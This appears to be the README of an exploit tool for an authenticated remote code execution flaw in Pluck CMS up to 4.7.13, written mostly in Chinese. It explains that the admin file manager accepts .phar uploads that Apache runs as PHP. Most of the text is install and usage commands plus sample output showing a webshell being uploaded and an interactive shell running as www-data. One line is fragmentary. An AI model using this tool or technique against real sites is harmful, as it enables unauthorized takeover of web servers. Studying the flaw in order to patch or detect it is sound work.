
Pluck CMS <= 4.7.13 经过身份验证的RCE漏洞利用,通过未验证的文件上传。上传PHP webshell并提供交互式命令shell。
Pluck CMS 4.7.13 之前的版本存在认证远程代码执行漏洞。管理员文件管理器(
admin.php?action=files)未验证文件扩展名,允许上传.phar文件,Apache 会将其作为 PHP 执行。通过此端点上传 webshell 会导致以 Web 服务器用户身份执行远程代码。
shell.phar。id 验证执行。python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
# Pluck at root
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD
# Pluck in a subdirectory
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck
示例:
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Logging in...
[+] Logged in
[*] Uploading webshell...
[+] Webshell uploaded
[*] Shell URL: http://10.10.10.10/files/shell.phar
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
www-data